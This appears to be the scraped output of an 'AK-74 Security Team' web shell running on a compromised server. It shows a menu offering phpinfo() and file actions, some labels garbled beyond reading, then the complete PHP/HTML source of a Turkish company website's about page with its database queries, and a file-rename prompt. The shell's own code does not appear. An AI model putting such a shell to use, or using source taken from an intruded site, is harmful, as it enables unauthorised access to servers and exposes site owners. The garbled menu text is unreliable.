.:: :[ AK-74 Security Team Web-shell ]: ::.
����� ����������
�������� ��������
phpinfo()
��������� PHP
��������� �������
�������������� �����
<?php include('db.php'); $ahh = $bag->query("select * from hakkimizda where hakk_id = 1")->fetch(PDO::FETCH_ASSOC); ?> <!DOCTYPE html> <!--[if IE 6]> <html id="ie6" class="ancient-ie old-ie no-js" dir="ltr"> <![endif]--> <!--[if IE 7]> <html id="ie7" class="ancient-ie old-ie no-js" dir="ltr"> <![endif]--> <!--[if IE 8]> <html id="ie8" class="old-ie no-js" dir="ltr"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!--> <?php include('db.php'); $yar = $bag->query("select * from ayarlar where ayar_id=1")->fetch(PDO::FETCH_ASSOC); ?> <html dir="ltr" class="no-js"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="viewport" content="initial-scale=1, maximum-scale=2"> <title><?php echo $yar['siteadi']; ?> | <?php echo $ahh['baslik']; ?></title> <base href="<?php echo $yar['siteurl']; ?>"> <!--[if IE]> <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link href="css/normalize.css" rel="stylesheet" type="text/css"> <link href="css/wireframe.css" rel="stylesheet" type="text/css"> <link href="css/main.css" rel="stylesheet" type="text/css"> <link href="css/media.css" rel="stylesheet" type="text/css"> <link href="skins/red/custom.css" rel="stylesheet" type="text/css" id="skin-style"> <!-- RoyalSlider --> <link rel="stylesheet" href="royalslider/royalslider.css"> <link rel="stylesheet" href="css/plugins.css"> <link rel="stylesheet" href="js/plugins/pretty-photo/css/prettyPhoto.css" type="text/css"> <link href="http://fonts.googleapis.com/css?family=Lato:400,700,900" rel="stylesheet" type="text/css"> <!-- All skins --> <link href="http://fonts.googleapis.com/css?family=Titillium+Web:600,600italic" rel="stylesheet" type="text/css"> <!-- "Retro" skin --> <link href="http://fonts.googleapis.com/css?family=Patua+One" rel="stylesheet" type="text/css"> <!-- "Business" skin --> <link href="http://fonts.googleapis.com/css?family=Roboto+Condensed" rel="stylesheet" type="text/css"> <!-- "Green" skin --> <link href="http://fonts.googleapis.com/css?family=Sanchez" rel="stylesheet" type="text/css"> <!-- "Organic" skin --> <script src="js/modernizr.js"></script> </head> <body class="single single-post single-format-standard"> <div id="page" ><!-- class="boxed" --> <!-- !Top-bar --> <?php include('ust.php'); ?> <header id="header" class="logo-left" role="banner"><!-- class="overlap"; class="logo-left", class="logo-center", class="logo-classic" --> <div class="wf-wrap"> <div class="wf-table"> <!-- !- Branding --> <div id="brandin" class="wf-td"> <?php include('db.php'); $logo = $bag->query("select * from sitelogo where logo_id=1")->fetch(PDO::FETCH_ASSOC); ?> <a href="anasayfa"><img src="usr/<?php echo $logo['logo']; ?>" width="189" height="79" alt=""></a> </div> <!-- !- Navigation --> <?php include('header.php'); ?> </div><!-- .wf-table --> </div><!-- .wf-wrap --> </header><!-- #header --> <!-- !Main --> <div id="main" class="sidebar-right"><!-- class="sidebar-none", class="sidebar-left", class="sidebar-right" --> <div class="wf-wrap"> <div class="wf-container-main"> <!-- !- Content --> <div id="content" role="main" class="content"> <article class="post format-photo"> <h1 class="entry-title"><?php echo $ahh['baslik']; ?></h1> <div class="hr-breadcrumbs divider-heder"> <div class="assistive-text">Buradasınız:</div> <ol class="breadcrumbs wf-td text-small"> <li><a href="anasayfa">Ana Sayfa</a></li> <li><a href="#"><?php echo $ahh['baslik']; ?></a></li> </ol> </div> <img class="alignleft" width="368" height="370" title="boat" alt="boat" src="usr/<?php echo $ahh['resim']; ?>"> <p><?php echo $ahh['metin']; ?></p> <div class="gap-20"></div> <div class="hr-thick"></div> <div class="gap-30"></div> <h2 class="entry-title">Son Projeler</h2> <div class="gap-10"></div> <!-- !-- Items grid --> <section class="items-grid wf-container"> <?php include('db.php'); $pe = $bag->query("select * from projeler order by proje_id desc")->fetchAll(PDO::FETCH_ASSOC); foreach($pe as $pi){ ?> <div class="wf-cell wf-1-3"> <div class="borders"> <article> <a href="proje/<?php echo $pi['psefurl']; ?>" class="alignleft post-rollover" title=""><img src="usr/proje/<?php echo $pi['resim']; ?>" style="width: 100px; height: 100;" alt=""></a> <div class="post-content"> <a href="proje/<?php echo $pi['psefurl']; ?>"><?php echo $pi['proje_adi']; ?></a><br> </div> </article> </div> </div> <?php } ?> </section><!-- .items-grid --> <div class="gap-10"></div> <div class="hr-thick"></div> <div class="gap-10"></div> </article><!-- .post --> <!-- !-- Comments --> </div><!-- #content --> <!-- !- Sidebar --> <aside id="sidebar" role="complementary" class="sidebar"> <!-- !-- Recent posts --> <section class="widget"> <div class="widget-title">Son Yazılar</div> <ul class="recent-posts"> <?php include('db.php'); $sa = $bag->query("select * from sayfalar order by sayfa_id desc")->fetchAll(PDO::FETCH_ASSOC); foreach($sa as $fa) { ?> <li> <article> <a href="sayfa/<?php echo $fa['sefurl']; ?>" class="alignleft post-rollover" title=""><img width="60" height="60" src="usr/<?php echo $fa['resim']; ?>" alt=""></a> <div class="post-content"> <a href="sayfa/<?php echo $fa['sefurl']; ?>"><?php echo $fa['baslik']; ?></a><br> </div> </article> </li> <?php } ?> </ul> </section> <!-- !-- Testimonials slider --> <section class="widget"> <?php include('duyurular.php'); ?> </section><!-- .widget --> </aside><!-- #sidebar --> </div><!-- .wf-container --> </div><!-- .wf-wrap --> </div><!-- #main --> <!-- !Footer --> <?php include('footer.php'); ?> <!-- !Bottom-bar --> <?php include('alt.php'); ?> </div><!-- #page --> <script src="js/jquery-1.9.1.min.js"></script> <script src="js/jquery-migrate-1.1.1.min.js"></script> <!-- RoyalSlider --> <script src="royalslider/jquery.royalslider.js"></script> <script src="js/plugins/pretty-photo/js/jquery.prettyPhoto.js"></script> <script src="js/plugins.js"></script> <script src="js/main.js"></script> <link rel="stylesheet" href="presscore-demo/css/show.css" type="text/css" /> </body> </html>
Rename:
-